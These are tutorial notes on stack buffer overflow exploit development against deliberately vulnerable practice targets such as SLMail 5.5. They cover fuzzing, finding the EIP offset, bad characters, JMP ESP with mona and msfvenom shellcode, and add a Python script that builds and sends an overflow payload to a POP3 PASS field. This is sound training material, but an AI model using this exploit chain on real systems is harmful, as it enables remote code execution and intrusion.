Buffer Overflow
Buffer overflow practice machines: https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice
SLMail 5.5: https://www.exploit-db.com/apps/12f1ab027e5374587e7e998c00682c5d-SLMail55_4433.exe
FreeFloat FTP Server: https://www.exploit-db.com/apps/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip
MiniShare 1.4.1: https://www.exploit-db.com/apps/0ffe5385147edd1f9e7b460c6d7cb0a6-minishare-1.4.1.zip
1. Attach Immunity Debugger (with the mona plugin) to the target service's process
2. Fuzz: send increasing numbers of A's until the service crashes, then work out the exact number of bytes needed before EIP is overwritten
3. Check there is enough space after EIP (where ESP points) for the shellcode; a reverse shell needs roughly 350 - 400 bytes
4. Check for bad characters: send every byte \x01-\xff after the EIP overwrite, compare the dump at ESP with that sequence, and remove each bad character found from the script before the next iteration (remove one at a time, since the byte following a bad one is often corrupted too)
5. Find a JMP ESP
a. !mona modules
- pick a module whose addresses contain no bad characters (no null bytes, e.g. a base of 0x5f400000 rather than 0x00400000)
and that has no DEP (NXCompat), ASLR or Rebase protection
b. Select it: press 'e' for the executable modules list, then double-click the module
c. Search for the jmp esp instruction: right-click > Search for > Command > jmp esp
d. (OR) right-click > Search for > Sequence of commands > "push esp" (enter) "retn"
(OR) look through the DLL's sections for the instruction bytes directly.
Note: Because in the SLMail example the SLMFC dll is not protected by DEP or ASLR, any part of SLMFC (.text, .data, .rdata etc.) can be used, not just the 'Executable' .text section
e. Using the command !mona find -s "\xff\xe4" -m <dll name>
search for jmp esp addresses (\xff\xe4 is the opcode of JMP ESP); pick one with no bad characters in the address
f. Verify the address really contains JMP ESP: right-click > copy address to clipboard, then click the "go to address" icon (Ctrl+G), paste it and check the disassembly
6. Verifying the JMP ESP
a. Add the address to the buffer overflow script IN REVERSE byte order (little-endian: 0x11223344 is written as "\x44\x33\x22\x11")
b. Set a breakpoint on the JMP ESP instruction with F2 in Immunity Debugger and run the script
c. Right-click the ESP address and choose "Follow in Dump"
to verify that the bytes at ESP (the next instructions to execute) are indeed CCCC....
Stepping with F7 executes the JMP ESP and lands in the "CCCC…"
7. Finally, add the shellcode to the buffer overflow script: generate it with msfvenom, passing the bad characters from step 4 with -b, prepend a NOP sled (e.g. 16 x \x90) so the encoder's decoder stub has room to work, and check that the total still fits in the space measured in step 3
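A skeleton exploit script that strings steps 2-7 together, added here as an example; it is not taken from the original notes or from any of the linked practice targets. Everything target-specific is an assumption: the POP3 USER/PASS delivery (SLMail-style), the host 10.0.0.5, and the OFFSET, JMP_ESP and BADCHARS constants are placeholders to be replaced by what your own fuzzing, bad-character test and !mona search return. It goes slightly beyond the notes by adding an msf-pattern style cyclic pattern to pin down the EIP offset exactly.

```python
#!/usr/bin/env python3
"""Added example (not from the original notes): skeleton of the exploit
script referred to in steps 2-7. The target protocol is assumed to be POP3
(the SLMail-style USER/PASS exchange); OFFSET, JMP_ESP and BADCHARS are
placeholder values that must be replaced with what fuzzing, the bad-char
test and !mona return for the real target."""
import socket
import struct

OFFSET = 2606                 # assumed: bytes before EIP is overwritten (step 2)
JMP_ESP = 0x5F4A358F          # assumed: JMP ESP address from !mona (step 5)
BADCHARS = frozenset({0x00, 0x0A, 0x0D})   # assumed result of step 4


def fuzz_buffers(start=100, step=200, stop=3000):
    """Step 2: growing runs of 'A' to send until the service crashes."""
    return [b"A" * n for n in range(start, stop + 1, step)]


def cyclic_pattern(length):
    """Step 2 refinement (msf-pattern style): unique 'Aa0Aa1...' triples, so
    the value that lands in EIP identifies the exact offset."""
    out = bytearray()
    for upper in range(65, 91):          # 'A'..'Z'
        for lower in range(97, 123):     # 'a'..'z'
            for digit in range(48, 58):  # '0'..'9'
                out += bytes((upper, lower, digit))
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_value, length=5000):
    """Offset of the four pattern bytes that ended up in EIP (the register
    holds them little-endian, so pack them the same way before searching)."""
    return cyclic_pattern(length).find(struct.pack("<I", eip_value))


def badchar_string(exclude=frozenset({0x00})):
    """Step 4: every byte 0x01..0xff minus those already known bad. Send it
    after EIP, compare the dump at ESP with this sequence, add the first
    mangled byte to `exclude` and repeat until the dump matches."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def pack_address(addr):
    """Step 6a: the address 'in reverse', i.e. 32-bit little-endian."""
    return struct.pack("<I", addr)


def find_badchars(shellcode, badchars=BADCHARS):
    """Step 7 guard: shellcode bytes that collide with the bad-char list."""
    return sorted({b for b in shellcode if b in badchars})


def build_payload(offset, eip, shellcode, nops=16, total_len=3500):
    """Steps 5-7: [A*offset][EIP][NOP sled][shellcode][C padding].
    With shellcode=b"" and nops=0 this is the step 6 check buffer: after the
    JMP ESP, ESP should point at CCCC... in the dump."""
    found = find_badchars(shellcode)
    if found:
        raise ValueError(f"shellcode contains bad chars: {found}")
    body = b"A" * offset + pack_address(eip) + b"\x90" * nops + shellcode
    if len(body) > total_len:
        raise ValueError("payload does not fit in the buffer (see step 3)")
    return body + b"C" * (total_len - len(body))


def send_pop3_pass(host, port, payload, user=b"test"):
    """Deliver the buffer in the POP3 PASS field of a SLMail-style target."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)                              # banner
        s.sendall(b"USER " + user + b"\r\n")
        s.recv(1024)
        s.sendall(b"PASS " + payload + b"\r\n")


if __name__ == "__main__":
    # Step 6 verification: breakpoint on JMP_ESP, then ESP -> CCCC...
    send_pop3_pass("10.0.0.5", 110, build_payload(OFFSET, JMP_ESP, b"", nops=0))
```

Run the crash stage with fuzz_buffers() (or cyclic_pattern() plus pattern_offset() on the EIP value shown in the debugger), the bad-character stage with badchar_string(), the check buffer with build_payload(..., b"", nops=0), and only then drop msfvenom output (generated with -b for the bad characters) in as shellcode. build_payload refuses shellcode that contains a listed bad byte or that overruns the measured space, which catches the two most common reasons a working JMP ESP still fails to give a shell.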